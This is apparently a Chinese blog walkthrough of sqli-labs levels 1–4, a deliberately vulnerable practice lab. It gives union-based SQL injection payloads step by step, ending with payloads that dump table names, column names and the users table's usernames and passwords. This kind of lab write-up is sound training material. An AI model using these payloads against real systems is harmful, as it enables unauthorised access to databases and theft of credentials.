zoukankan      html  css  js  c++  java
  • sqli-labs less1-4(union注入)

    less-1

    考点:Single quotes
    输入:

    1. 判断类型
    • ?id=1

    返回loginname和password。输入的id就是与后台数据库连接的接口通过id=? 查询数据库信息

    • ?id=1' 报错

    其中 '1'' LIMIT 0,1去掉我们输入的1'就能看到''LIMIT 0,1为网站的原生sql语句。那也就是说明网站的id类型为单引号包裹的字符型

    • id=1' and 1=1 --+

    • id=1' and 1=2 --+

    如果两句语句得到的页面信息不一致说明id类型正确,继续后面操作

    1. 判断字段个数
    • ?id=1' order by num --+ (nums是个变量随便进行调试直到页面报错)

    1. 查询数据库
    • 1' and 1=2 union select 1, version(), database(); --+
    1. 爆表名
    • 1' and 1=2 union select 1, (select group_concat(table_name) from information_schema.tables WHERE table_schema='security'), 3 --+

    1. 爆列名
    • 1' and 1=2 union select 1, (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),3 --+
    1. 数据
    • ?id=1' and 1=2 union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+

    less-2

    与less-1不同的是闭合方式,但是操作完全一样

    less-3

    与less-1不同的是数据类型,操作一样

    less-4

    less-4 用的是("")的方式闭合字符串的,字符型注入

  • 相关阅读:
    2017中国大学生程序设计竞赛
    HDU 1426 Sudoku Killer【DFS 数独】
    Silver Cow Party---poj3268(最短路,迪杰斯特拉)
    Heavy Transportation---poj1797
    Cow Contest---poj3660
    Frogger--poj2253
    最短路基础
    打字母小游戏
    蔡勒(Zeller)公式--黑色星期五
    2的次幂表示
  • 原文地址:https://www.cnblogs.com/zjhzjhhh/p/14105223.html
Copyright © 2011-2022 走看看